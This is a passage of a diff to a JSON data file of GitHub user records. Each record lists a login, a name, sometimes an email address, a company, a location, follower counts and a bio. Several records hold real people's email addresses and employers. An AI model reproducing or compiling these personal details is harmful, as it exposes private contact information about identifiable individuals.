+ "updated_at": "2024-09-18T08:01:01Z", + "node_id": "MDQ6VXNlcjU0ODk3Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391728,149 +649177,149 @@ }, { "model": "github.user", - "pk": 1260, + "pk": 6531, "fields": { - "nest_created_at": "2024-09-11T23:16:53.374Z", - "nest_updated_at": "2024-09-11T23:16:53.374Z", + "nest_created_at": "2024-09-22T07:46:16.585Z", + "nest_updated_at": "2024-09-22T18:48:49.495Z", "name": "", - "login": "sycured", + "login": "nikstur", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60801403?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/61635709?v=4", "company": "", - "location": "Worldwide (digital nomad)", + "location": "", "collaborators_count": 0, - "following_count": 70, - "followers_count": 25, - "public_gists_count": 4, - "public_repositories_count": 87, - "created_at": "2020-02-08T00:46:04Z", - "updated_at": "2024-09-06T12:03:41Z", - "node_id": "MDQ6VXNlcjYwODAxNDAz", - "bio": "Consultant", - "is_hireable": true, + "following_count": 6, + "followers_count": 68, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2020-02-29T21:06:42Z", + "updated_at": "2024-09-21T20:47:11Z", + "node_id": "MDQ6VXNlcjYxNjM1NzA5", + "bio": "NixOS & Rust", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1261, + "pk": 6532, "fields": { - "nest_created_at": "2024-09-11T23:16:55.026Z", - "nest_updated_at": "2024-09-11T23:16:55.026Z", - "name": "Matthias", - "login": "gurucubano", + "nest_created_at": "2024-09-22T07:46:16.895Z", + "nest_updated_at": "2024-09-22T18:48:49.823Z", + "name": "KPNK", + "login": "keponk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8157672?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15008108?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-07-14T12:02:26Z", - "updated_at": "2024-09-04T16:22:16Z", - "node_id": "MDQ6VXNlcjgxNTc2NzI=", - "bio": "", + "following_count": 11, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2015-10-07T03:22:25Z", + "updated_at": "2024-09-20T08:27:07Z", + "node_id": "MDQ6VXNlcjE1MDA4MTA4", + "bio": "https://gitlab.com/keponk\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1262, + "pk": 6533, "fields": { - "nest_created_at": "2024-09-11T23:16:55.827Z", - "nest_updated_at": "2024-09-11T23:16:55.827Z", - "name": "hliu", - "login": "hliu168", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6569502?v=4", - "company": "", - "location": "Toronto, ON", + "nest_created_at": "2024-09-22T07:46:17.863Z", + "nest_updated_at": "2024-09-22T18:48:50.761Z", + "name": "Helio Frota", + "login": "helio-frota", + "email": "00hf11@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6443576?v=4", + "company": "Red Hat", + "location": "Brazil", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2014-02-02T19:56:06Z", - "updated_at": "2024-08-03T00:07:37Z", - "node_id": "MDQ6VXNlcjY1Njk1MDI=", - "bio": "B.Sc. Computer Engineering.\r\n", + "following_count": 25, + "followers_count": 75, + "public_gists_count": 1, + "public_repositories_count": 122, + "created_at": "2014-01-19T14:58:38Z", + "updated_at": "2024-09-20T00:02:15Z", + "node_id": "MDQ6VXNlcjY0NDM1NzY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1263, + "pk": 6534, "fields": { - "nest_created_at": "2024-09-11T23:16:57.063Z", - "nest_updated_at": "2024-09-11T23:16:57.063Z", - "name": "Robust", - "login": "usmankhanisb", + "nest_created_at": "2024-09-22T07:46:18.175Z", + "nest_updated_at": "2024-09-22T18:48:51.071Z", + "name": "Maxwell Koo", + "login": "mjkoo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39516394?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30420?v=4", + "company": "ForAllSecure, Inc.", + "location": "Buffalo, NY", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-05-22T08:30:22Z", - "updated_at": "2024-07-13T21:02:28Z", - "node_id": "MDQ6VXNlcjM5NTE2Mzk0", + "following_count": 27, + "followers_count": 59, + "public_gists_count": 2, + "public_repositories_count": 81, + "created_at": "2008-10-22T16:38:47Z", + "updated_at": "2024-09-07T23:59:29Z", + "node_id": "MDQ6VXNlcjMwNDIw", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "mjkoo_" } }, { "model": "github.user", - "pk": 1264, + "pk": 6535, "fields": { - "nest_created_at": "2024-09-11T23:16:58.746Z", - "nest_updated_at": "2024-09-11T23:16:58.746Z", - "name": "Kemal", - "login": "kemalmeler", + "nest_created_at": "2024-09-22T07:46:18.493Z", + "nest_updated_at": "2024-09-22T18:48:51.381Z", + "name": "Sébastien Duquette", + "login": "sduquette-devolutions", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17831255?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70600710?v=4", + "company": "@Devolutions ", "location": "", "collaborators_count": 0, - "following_count": 28, - "followers_count": 3, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2016-03-14T15:11:14Z", - "updated_at": "2024-08-08T12:25:51Z", - "node_id": "MDQ6VXNlcjE3ODMxMjU1", + "public_repositories_count": 3, + "created_at": "2020-09-01T18:13:49Z", + "updated_at": "2024-08-28T13:03:40Z", + "node_id": "MDQ6VXNlcjcwNjAwNzEw", "bio": "", "is_hireable": false, - "twitter_username": "kemalmeler" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1265, + "pk": 6536, "fields": { - "nest_created_at": "2024-09-11T23:16:59.558Z", - "nest_updated_at": "2024-09-11T23:19:44.829Z", - "name": "", - "login": "VijayB2606", + "nest_created_at": "2024-09-22T07:46:18.808Z", + "nest_updated_at": "2024-09-22T18:48:51.700Z", + "name": "Adam Reichold", + "login": "adamreichold", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93205353?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12997846?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 31, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-10-26T14:01:24Z", - "updated_at": "2024-06-13T11:27:50Z", - "node_id": "U_kgDOBY4zaQ", + "public_repositories_count": 30, + "created_at": "2015-06-22T09:35:56Z", + "updated_at": "2024-09-16T07:05:33Z", + "node_id": "MDQ6VXNlcjEyOTk3ODQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391878,24 +649327,24 @@ }, { "model": "github.user", - "pk": 1266, + "pk": 6537, "fields": { - "nest_created_at": "2024-09-11T23:17:01.683Z", - "nest_updated_at": "2024-09-11T23:19:56.147Z", - "name": "Gautam Beri", - "login": "gauti11", - "email": "gberi1@binghamton.edu", - "avatar_url": "https://avatars.githubusercontent.com/u/6707006?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:46:19.443Z", + "nest_updated_at": "2024-09-22T18:48:52.320Z", + "name": "Kyle Huey", + "login": "khuey", + "email": "khuey@kylehuey.com", + "avatar_url": "https://avatars.githubusercontent.com/u/325892?v=4", + "company": "Pernosco", + "location": "San Francisco, CA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2014-02-17T16:36:48Z", - "updated_at": "2024-04-02T18:36:40Z", - "node_id": "MDQ6VXNlcjY3MDcwMDY=", + "following_count": 0, + "followers_count": 63, + "public_gists_count": 3, + "public_repositories_count": 73, + "created_at": "2010-07-08T00:08:29Z", + "updated_at": "2024-05-29T17:02:38Z", + "node_id": "MDQ6VXNlcjMyNTg5Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391903,24 +649352,24 @@ }, { "model": "github.user", - "pk": 1267, + "pk": 6538, "fields": { - "nest_created_at": "2024-09-11T23:17:03.360Z", - "nest_updated_at": "2024-09-11T23:17:03.360Z", - "name": "Georg M. Sorst", - "login": "georgms", + "nest_created_at": "2024-09-22T07:46:19.764Z", + "nest_updated_at": "2024-09-22T18:48:52.627Z", + "name": "Marcel Lilienthal", + "login": "mlilien", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2857634?v=4", - "company": "@Nosto ", - "location": "AT", + "avatar_url": "https://avatars.githubusercontent.com/u/134974?v=4", + "company": "", + "location": "Nuremberg, Germany", "collaborators_count": 0, "following_count": 3, - "followers_count": 8, + "followers_count": 6, "public_gists_count": 1, - "public_repositories_count": 42, - "created_at": "2012-11-21T22:23:41Z", - "updated_at": "2024-09-08T13:43:32Z", - "node_id": "MDQ6VXNlcjI4NTc2MzQ=", + "public_repositories_count": 8, + "created_at": "2009-10-04T20:32:53Z", + "updated_at": "2024-09-16T07:40:39Z", + "node_id": "MDQ6VXNlcjEzNDk3NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391928,99 +649377,124 @@ }, { "model": "github.user", - "pk": 1268, + "pk": 6539, "fields": { - "nest_created_at": "2024-09-11T23:17:05.021Z", - "nest_updated_at": "2024-09-11T23:24:36.679Z", - "name": "Andres Almiray", - "login": "aalmiray", - "email": "aalmiray@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/13969?v=4", - "company": "", - "location": "Basel, Switzerland", + "nest_created_at": "2024-09-22T07:46:20.417Z", + "nest_updated_at": "2024-09-22T18:48:53.929Z", + "name": "Thore Göbel", + "login": "thgoebel-planck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/161811558?v=4", + "company": "@plancksecurity", + "location": "Zürich 🇨🇭", "collaborators_count": 0, - "following_count": 65, - "followers_count": 883, - "public_gists_count": 171, - "public_repositories_count": 253, - "created_at": "2008-06-17T00:30:56Z", - "updated_at": "2024-09-05T07:55:11Z", - "node_id": "MDQ6VXNlcjEzOTY5", - "bio": "I code for fun and help others in the process. Java Champion. Co-founder of Hackergarten & Hack.Commit.Push. Creator of @jreleaser 🚀", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-03-01T07:25:32Z", + "updated_at": "2024-09-04T07:29:36Z", + "node_id": "U_kgDOCaUMZg", + "bio": "Work profile.\r\nPrivate profile: @thgoebel", "is_hireable": false, - "twitter_username": "aalmiray" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1269, + "pk": 6540, "fields": { - "nest_created_at": "2024-09-11T23:17:06.692Z", - "nest_updated_at": "2024-09-11T23:17:06.692Z", - "name": "", - "login": "SSarka69", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121481361?v=4", + "nest_created_at": "2024-09-22T07:46:20.723Z", + "nest_updated_at": "2024-09-22T18:48:54.245Z", + "name": "Tshepang Mbambo", + "login": "tshepang", + "email": "tshepang@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/588486?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 145, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-12-27T07:30:09Z", - "updated_at": "2022-12-27T07:30:09Z", - "node_id": "U_kgDOBz2okQ", + "public_repositories_count": 240, + "created_at": "2011-01-28T15:00:39Z", + "updated_at": "2024-09-15T11:22:36Z", + "node_id": "MDQ6VXNlcjU4ODQ4Ng==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "tshepang_dev" } }, { "model": "github.user", - "pk": 1270, + "pk": 6541, "fields": { - "nest_created_at": "2024-09-11T23:17:07.615Z", - "nest_updated_at": "2024-09-11T23:17:07.615Z", - "name": "Shunsuke Suzuki", - "login": "suzuki-shunsuke", + "nest_created_at": "2024-09-22T07:46:21.359Z", + "nest_updated_at": "2024-09-22T18:48:54.868Z", + "name": "Carlos Feria", + "login": "carlosthe19916", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13323303?v=4", - "company": "", - "location": "Tokyo, Japan", + "avatar_url": "https://avatars.githubusercontent.com/u/2582866?v=4", + "company": "Red Hat", + "location": "Ayacucho, Perú", "collaborators_count": 0, - "following_count": 0, - "followers_count": 323, - "public_gists_count": 33, - "public_repositories_count": 505, - "created_at": "2015-07-13T23:22:32Z", - "updated_at": "2024-08-01T02:05:21Z", - "node_id": "MDQ6VXNlcjEzMzIzMzAz", - "bio": "Platform Engineer / OSS Developer / Go", + "following_count": 26, + "followers_count": 62, + "public_gists_count": 3, + "public_repositories_count": 334, + "created_at": "2012-10-17T17:53:52Z", + "updated_at": "2024-09-13T11:22:13Z", + "node_id": "MDQ6VXNlcjI1ODI4NjY=", + "bio": "Open source contributor - always learning new things", + "is_hireable": true, + "twitter_username": "carlosthe19916" + } +}, +{ + "model": "github.user", + "pk": 6542, + "fields": { + "nest_created_at": "2024-09-22T07:46:34.693Z", + "nest_updated_at": "2024-09-22T18:49:08.352Z", + "name": "Tristan Bastian", + "login": "reey", + "email": "tristan-c.bastian@gmx.de", + "avatar_url": "https://avatars.githubusercontent.com/u/23506385?v=4", + "company": "@SoftwareAG", + "location": "Germany", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2016-11-16T17:32:05Z", + "updated_at": "2024-09-04T11:48:24Z", + "node_id": "MDQ6VXNlcjIzNTA2Mzg1", + "bio": "", "is_hireable": false, - "twitter_username": "szkdash_en" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1271, + "pk": 6543, "fields": { - "nest_created_at": "2024-09-11T23:17:08.444Z", - "nest_updated_at": "2024-09-11T23:17:08.444Z", + "nest_created_at": "2024-09-22T07:46:40.414Z", + "nest_updated_at": "2024-09-22T18:49:14.013Z", "name": "", - "login": "Mrinnaal", + "login": "merigrey", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30141047?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/61337348?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-07-13T07:07:29Z", - "updated_at": "2023-10-21T01:51:42Z", - "node_id": "MDQ6VXNlcjMwMTQxMDQ3", + "public_repositories_count": 1, + "created_at": "2020-02-22T01:35:39Z", + "updated_at": "2024-07-30T01:01:04Z", + "node_id": "MDQ6VXNlcjYxMzM3MzQ4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392028,24 +649502,24 @@ }, { "model": "github.user", - "pk": 1272, + "pk": 6544, "fields": { - "nest_created_at": "2024-09-11T23:17:09.269Z", - "nest_updated_at": "2024-09-18T19:07:01.467Z", - "name": "Jim Klimov", - "login": "jimklimov", + "nest_created_at": "2024-09-22T07:46:41.713Z", + "nest_updated_at": "2024-09-22T18:49:15.261Z", + "name": "", + "login": "jcrowleyveracode", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1636756?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/102318101?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 43, - "public_gists_count": 28, - "public_repositories_count": 223, - "created_at": "2012-04-12T13:13:18Z", - "updated_at": "2024-09-11T22:22:42Z", - "node_id": "MDQ6VXNlcjE2MzY3NTY=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-03-24T17:29:12Z", + "updated_at": "2022-09-15T17:28:15Z", + "node_id": "U_kgDOBhlAFQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392053,124 +649527,124 @@ }, { "model": "github.user", - "pk": 1273, + "pk": 6545, "fields": { - "nest_created_at": "2024-09-11T23:17:11.008Z", - "nest_updated_at": "2024-09-11T23:17:11.853Z", - "name": "Andrew Russell", - "login": "Andrew-Russell-fingo", - "email": "andrew.russell@fingo.co.nz", - "avatar_url": "https://avatars.githubusercontent.com/u/48190317?v=4", - "company": "Fingo", - "location": "Wellington NZ", + "nest_created_at": "2024-09-22T07:46:42.021Z", + "nest_updated_at": "2024-09-22T18:49:15.575Z", + "name": "Jon Geater", + "login": "JAG-UK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19373278?v=4", + "company": "", + "location": "Cambridge, UK", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-03-03T23:19:28Z", - "updated_at": "2024-07-04T00:06:05Z", - "node_id": "MDQ6VXNlcjQ4MTkwMzE3", - "bio": "Oracle and Java Developer with a heap of experience working by and for Government in wellington.\r\nWorking for Fingo ltd.", + "public_repositories_count": 13, + "created_at": "2016-05-15T13:25:01Z", + "updated_at": "2024-09-19T18:57:35Z", + "node_id": "MDQ6VXNlcjE5MzczMjc4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1274, + "pk": 6546, "fields": { - "nest_created_at": "2024-09-11T23:17:12.696Z", - "nest_updated_at": "2024-09-11T23:17:12.696Z", - "name": "Ricardo A. Reyes", - "login": "RicardoAReyes", + "nest_created_at": "2024-09-22T07:46:43.305Z", + "nest_updated_at": "2024-09-22T18:49:16.816Z", + "name": "Ritesh Noronha", + "login": "riteshnoronha", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2433138?v=4", - "company": "www.Tidelift.com", - "location": "Washington, D.C. ", + "avatar_url": "https://avatars.githubusercontent.com/u/147178?v=4", + "company": "@interlynk-io", + "location": "San Mateo, CA", "collaborators_count": 0, - "following_count": 91, - "followers_count": 28, + "following_count": 113, + "followers_count": 18, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2012-09-27T00:45:40Z", - "updated_at": "2024-08-15T22:00:02Z", - "node_id": "MDQ6VXNlcjI0MzMxMzg=", - "bio": "Senior Solutions Architect @tidelift ", - "is_hireable": false, - "twitter_username": "Ricardo_A_Reyes" + "public_repositories_count": 12, + "created_at": "2009-10-31T17:54:24Z", + "updated_at": "2024-09-21T02:34:08Z", + "node_id": "MDQ6VXNlcjE0NzE3OA==", + "bio": "", + "is_hireable": true, + "twitter_username": "interlynkrcn" } }, { "model": "github.user", - "pk": 1275, + "pk": 6547, "fields": { - "nest_created_at": "2024-09-11T23:17:13.546Z", - "nest_updated_at": "2024-09-11T23:17:13.546Z", - "name": "Beltran Rueda", - "login": "beltran-rubo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3718440?v=4", - "company": "VMware", - "location": "", + "nest_created_at": "2024-09-22T07:46:44.269Z", + "nest_updated_at": "2024-09-22T18:49:17.757Z", + "name": "Miguel Martinez Trivino", + "login": "migmartri", + "email": "migmartri@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24523?v=4", + "company": "chainloop.dev", + "location": "Sevilla, Spain", "collaborators_count": 0, - "following_count": 2, - "followers_count": 16, - "public_gists_count": 1, - "public_repositories_count": 23, - "created_at": "2013-02-27T16:46:33Z", - "updated_at": "2024-02-27T17:57:51Z", - "node_id": "MDQ6VXNlcjM3MTg0NDA=", - "bio": "", + "following_count": 107, + "followers_count": 88, + "public_gists_count": 6, + "public_repositories_count": 57, + "created_at": "2008-09-14T10:56:57Z", + "updated_at": "2024-09-15T14:01:58Z", + "node_id": "MDQ6VXNlcjI0NTIz", + "bio": "Software Supply Chain passionate. Founder @chainloop-dev, OSS contributor. YCombinator alumnus.\r\n", "is_hireable": false, - "twitter_username": "beltranrubo" + "twitter_username": "migmartri" } }, { "model": "github.user", - "pk": 1276, + "pk": 6548, "fields": { - "nest_created_at": "2024-09-11T23:17:14.352Z", - "nest_updated_at": "2024-09-11T23:17:14.352Z", - "name": "David Lambert", - "login": "DavidLambertCyber", - "email": "DavidLambertCyber@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/8062671?v=4", + "nest_created_at": "2024-09-22T07:46:44.890Z", + "nest_updated_at": "2024-09-22T19:42:21.093Z", + "name": "Sekwah", + "login": "sekwah41", + "email": "contact@sekwah.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3209834?v=4", "company": "", - "location": "Earth", + "location": "England", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2014-07-03T22:16:44Z", - "updated_at": "2023-06-30T18:10:52Z", - "node_id": "MDQ6VXNlcjgwNjI2NzE=", - "bio": "", + "following_count": 29, + "followers_count": 69, + "public_gists_count": 6, + "public_repositories_count": 142, + "created_at": "2013-01-07T21:17:16Z", + "updated_at": "2024-09-19T14:36:51Z", + "node_id": "MDQ6VXNlcjMyMDk4MzQ=", + "bio": "Professional goofball & maker of things", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sekwah" } }, { "model": "github.user", - "pk": 1277, + "pk": 6549, "fields": { - "nest_created_at": "2024-09-11T23:17:15.212Z", - "nest_updated_at": "2024-09-16T22:28:47.461Z", - "name": "", - "login": "nigellh", + "nest_created_at": "2024-09-22T07:46:45.207Z", + "nest_updated_at": "2024-09-22T18:49:18.691Z", + "name": "Greg Rivera", + "login": "pgregrivera", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12110404?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43577377?v=4", + "company": "CAST", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-04-25T09:52:41Z", - "updated_at": "2024-09-03T15:32:53Z", - "node_id": "MDQ6VXNlcjEyMTEwNDA0", + "public_repositories_count": 2, + "created_at": "2018-09-25T13:54:58Z", + "updated_at": "2024-01-03T19:31:55Z", + "node_id": "MDQ6VXNlcjQzNTc3Mzc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392178,49 +649652,24 @@ }, { "model": "github.user", - "pk": 1278, + "pk": 6550, "fields": { - "nest_created_at": "2024-09-11T23:17:17.771Z", - "nest_updated_at": "2024-09-11T23:17:17.771Z", - "name": "Behrouz Soroushian", - "login": "bsoroushian", - "email": "bsoroushian@vmware.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1178713?v=4", - "company": "VMware", - "location": "Toronto, Ontario, Canada", + "nest_created_at": "2024-09-22T07:46:45.519Z", + "nest_updated_at": "2024-09-22T18:49:19.023Z", + "name": "", + "login": "jonli-sec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/167577434?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2011-11-07T18:54:10Z", - "updated_at": "2024-07-11T14:09:00Z", - "node_id": "MDQ6VXNlcjExNzg3MTM=", - "bio": "", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1279, - "fields": { - "nest_created_at": "2024-09-11T23:17:18.584Z", - "nest_updated_at": "2024-09-11T23:27:44.683Z", - "name": "Riley Martine", - "login": "rmartine-ias", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107639398?v=4", - "company": "Integral Ad Science", - "location": "Denver, CO", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, - "public_gists_count": 1, - "public_repositories_count": 20, - "created_at": "2022-06-16T16:36:22Z", - "updated_at": "2024-08-05T16:47:06Z", - "node_id": "U_kgDOBmpyZg", + "created_at": "2024-04-19T19:51:44Z", + "updated_at": "2024-04-19T19:51:44Z", + "node_id": "U_kgDOCf0HWg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392228,24 +649677,24 @@ }, { "model": "github.user", - "pk": 1280, + "pk": 6551, "fields": { - "nest_created_at": "2024-09-11T23:17:19.421Z", - "nest_updated_at": "2024-09-11T23:17:19.421Z", - "name": "Alex Mark", - "login": "alexthemark", + "nest_created_at": "2024-09-22T07:46:45.836Z", + "nest_updated_at": "2024-09-22T18:49:19.332Z", + "name": "mikey strauss", + "login": "houdini91", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3020611?v=4", - "company": "-", - "location": "New York, NY", + "avatar_url": "https://avatars.githubusercontent.com/u/3135211?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 5, + "following_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2012-12-12T00:20:13Z", - "updated_at": "2024-09-06T15:42:56Z", - "node_id": "MDQ6VXNlcjMwMjA2MTE=", + "public_repositories_count": 17, + "created_at": "2012-12-27T15:31:41Z", + "updated_at": "2024-09-10T09:45:12Z", + "node_id": "MDQ6VXNlcjMxMzUyMTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392253,24 +649702,24 @@ }, { "model": "github.user", - "pk": 1281, + "pk": 6552, "fields": { - "nest_created_at": "2024-09-11T23:17:20.390Z", - "nest_updated_at": "2024-09-12T01:26:54.679Z", + "nest_created_at": "2024-09-22T07:46:46.150Z", + "nest_updated_at": "2024-09-22T18:49:19.644Z", "name": "", - "login": "JayAtFujifilm", + "login": "ccideas", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/99899201?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/133834397?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-02-17T16:13:35Z", - "updated_at": "2024-07-25T20:59:53Z", - "node_id": "U_kgDOBfRXQQ", + "public_repositories_count": 10, + "created_at": "2023-05-17T02:41:15Z", + "updated_at": "2024-06-19T10:46:21Z", + "node_id": "U_kgDOB_omnQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392278,24 +649727,24 @@ }, { "model": "github.user", - "pk": 1282, + "pk": 6553, "fields": { - "nest_created_at": "2024-09-11T23:17:22.026Z", - "nest_updated_at": "2024-09-11T23:17:22.026Z", - "name": "", - "login": "kimdu0", + "nest_created_at": "2024-09-22T07:46:46.468Z", + "nest_updated_at": "2024-09-22T18:49:19.966Z", + "name": "Sheng", + "login": "Nifury", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68895169?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7867461?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 8, - "followers_count": 6, + "followers_count": 28, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2020-07-28T08:19:27Z", - "updated_at": "2024-08-31T04:25:44Z", - "node_id": "MDQ6VXNlcjY4ODk1MTY5", + "public_repositories_count": 10, + "created_at": "2014-06-12T06:30:33Z", + "updated_at": "2024-09-05T00:29:39Z", + "node_id": "MDQ6VXNlcjc4Njc0NjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392303,49 +649752,49 @@ }, { "model": "github.user", - "pk": 1283, + "pk": 6554, "fields": { - "nest_created_at": "2024-09-11T23:17:22.822Z", - "nest_updated_at": "2024-09-11T23:17:22.822Z", - "name": "", - "login": "pkiesslingsonatype", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/113676419?v=4", - "company": "Sonatype", - "location": "Germany", + "nest_created_at": "2024-09-22T07:46:47.418Z", + "nest_updated_at": "2024-09-22T18:49:20.916Z", + "name": "Marius Biebel", + "login": "Mariuxdeangelo", + "email": "Mariuxdeangelo@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/57811414?v=4", + "company": "", + "location": "Munich Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2022-09-16T09:22:16Z", - "updated_at": "2024-09-02T14:36:48Z", - "node_id": "U_kgDOBsaQgw", - "bio": "", + "public_repositories_count": 5, + "created_at": "2019-11-15T18:56:47Z", + "updated_at": "2024-09-09T23:25:14Z", + "node_id": "MDQ6VXNlcjU3ODExNDE0", + "bio": "More a Gitlab person ;D", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1284, + "pk": 6555, "fields": { - "nest_created_at": "2024-09-11T23:17:23.679Z", - "nest_updated_at": "2024-09-11T23:17:23.679Z", - "name": "", - "login": "sridattadev", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/145785451?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:46:47.738Z", + "nest_updated_at": "2024-09-22T18:49:21.230Z", + "name": "John McDonald", + "login": "jm-ds", + "email": "john@threatrix.io", + "avatar_url": "https://avatars.githubusercontent.com/u/33268211?v=4", + "company": "Threatrix, Inc", + "location": "North America", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-09-22T14:45:34Z", - "updated_at": "2023-09-22T14:45:34Z", - "node_id": "U_kgDOCLCCaw", + "public_repositories_count": 101, + "created_at": "2017-10-31T21:52:16Z", + "updated_at": "2024-09-15T09:32:14Z", + "node_id": "MDQ6VXNlcjMzMjY4MjEx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -392353,24 +649802,24 @@ }, { "model": "github.user", - "pk": 1285, + "pk": 6556, "fields": { - "nest_created_at": "2024-09-11T23:17:24.489Z", - "nest_updated_at": "2024-09-11T23:17:29.538Z", - "name": "Marc-Etienne Vargenau", - "login": "vargenau", - "email": "marc-etienne.vargenau@nokia.com", - "avatar_url": 